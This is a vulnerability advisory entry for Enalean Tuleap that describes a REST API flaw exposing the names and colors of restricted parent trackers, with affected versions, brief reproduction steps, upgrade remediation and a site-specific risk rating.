Enalean Tuleap
Moderate fix3 remedies
cpe:2.3:a:enalean:tuleap:*:*:*:*:*:*:*
Moderate fix3 remedies
- < 16.5.99.1742392651
- < 16.5-5
- < 16.4-8
Tuleap REST API Parent Tracker Permission Vulnerability
Vulnerability
Patched
A vulnerability exists in Tuleap's REST API, where read permissions are not properly enforced on parent trackers. This issue allows users to access names and colors of parent trackers that they should not be able to see. The vulnerability is present in Tuleap Community Edition versions prior to 16.5.99.1742392651, as well as in Tuleap Enterprise Edition versions prior to 16.5-5 and 16.4-8.
Impact
Exploitation of this vulnerability could lead to unauthorized visibility of tracker names and details that are meant to be restricted.
Reproduction
To reproduce this vulnerability, access a child tracker that has a parent tracker. Then, send a GET request to the child tracker’s API endpoint. The response will include the parent tracker’s name and color, even if the user does not have permission to view that tracker.
Remediation
Users can upgrade to Tuleap Community Edition 16.5.99.1742392651 or Tuleap Enterprise Edition 16.5-5 or 16.4-8 to address this vulnerability.
Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM
Vulnerability Rating
Custom Algorithm
spread
3.1impact
0.6exploitability
6.3remediation
7.7relevance
0.0threat
4.8urgency
2.9incentive
1.7Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.